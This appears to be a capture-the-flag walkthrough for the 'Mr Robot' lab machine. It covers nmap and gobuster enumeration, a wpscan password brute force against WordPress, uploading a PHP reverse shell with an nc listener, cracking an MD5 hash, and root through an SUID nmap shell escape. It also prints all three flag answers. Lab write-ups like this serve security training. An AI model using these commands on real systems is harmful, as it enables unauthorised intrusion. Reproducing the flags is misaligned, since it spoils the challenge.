Based on the Mr. Robot show, can you root this box?
scan the machine
nmap -sS -sV -sC -T4 10.10.176.209
view the webpage, it appears a mr robot terminal and a list of command for you try
view source
i think about mr robot, let's check robots.txt
we have a dictionary file fsocity.dic, maybe a list of password for later, and our flag 1
| Flag | key-1-of-3.txt |
|---|---|
| Answer | 073403c8a58a1f80d943455fb30724b9 |
enum the directory of webpage
gobuster dir -u http://10.10.176.209 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40
it's seem a wordpress site and a wp-login panel
after research, i know that mr robot's name is elliot, so i think it's our username
before do a bruteforce, the givin wordlist contain 858,161 lines, so lets sort it out and remove duplicates
sort fsocity.dic | uniq > sorted_fsociety.dic
now you can bruteforce the credentials by using hydra
but i will use wpscan to attack this wordpress site
wpscan --url http://10.10.176.209/wp-login -U elliot -P sorted_fsociety.dic -t 30
we now successfully gained access to the WordPress Panel
now upload a php reverse shell to gain access
cp /usr/share/webshells/php/php-reverse-shell.php .
vi php-reverse-shell.php
i update the 404.php with our reverse shell
nc -vlnp 1234
upgrade the shell
at /home/robot, i see the flag 2 and a md5 password of robot
crack the password
here you go, flag 2
| Flag | key-2-of-3.txt |
|---|---|
| Answer | 822c73956184f694993bede3eb39f959 |
finding suid bit
find / -perm /4000 2>/dev/null
leverage the nmap to get root
nmap --interactive
!sh
| Flag | key-3-of-3.txt |
|---|---|
| Answer | 04787ddef27c3dee1ee161b21670b4e4 |